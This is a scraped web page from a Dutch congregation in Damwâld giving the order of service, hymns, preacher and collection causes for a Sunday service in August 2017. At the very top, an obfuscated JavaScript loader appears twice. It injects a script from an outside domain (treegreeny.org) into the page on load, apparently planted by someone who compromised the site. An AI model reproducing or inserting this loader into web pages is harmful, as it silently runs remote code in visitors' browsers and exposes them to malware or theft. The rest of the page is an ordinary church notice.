;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 20 augustus 2017 9:30 uur - PKN Damwâld
zondag 20 augustus 2017
09:30 uur

Kerkdienst zondag 20 augustus 2017 9:30 uur

Informatie

Voorganger:Kand. J.W. Bassie, Groningen
Organist:Ivo van Hijum
Liturgie
Lied voor de dienst Elb 448
Welkom en mededelingen
Aanvangslied Psalm 42: 1, 5, 7
Stil gebed, Votum en Groet
We zingen: Psalm 33: 7, 8
Lezing van het Gebod/ Apostolisch vermaan
We zingen: Psalm 25: 2, 4, 7
Gebed om de verlichting met de Heilige Geest .
We lezen: Psalm 13, Mattheüs 10:28
We zingen: Gezang 21: 1, 5
Verkondiging .
We zingen: Psalm 139: 2, 10, 14
Dankgebed, voorbeden .
Collecte
Slotlied Gezang 427: 1, 6, 7
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: HGJB

De HGJB (Hervormd-Gereformeerde Jeugdbond) wil samen met de plaatselijke gemeente jongeren helpen hun geloof te ontdekken en te beleven in de kerk van nu.

Tweede collecte: Kerk
Uitganscollecte: Bouwfonds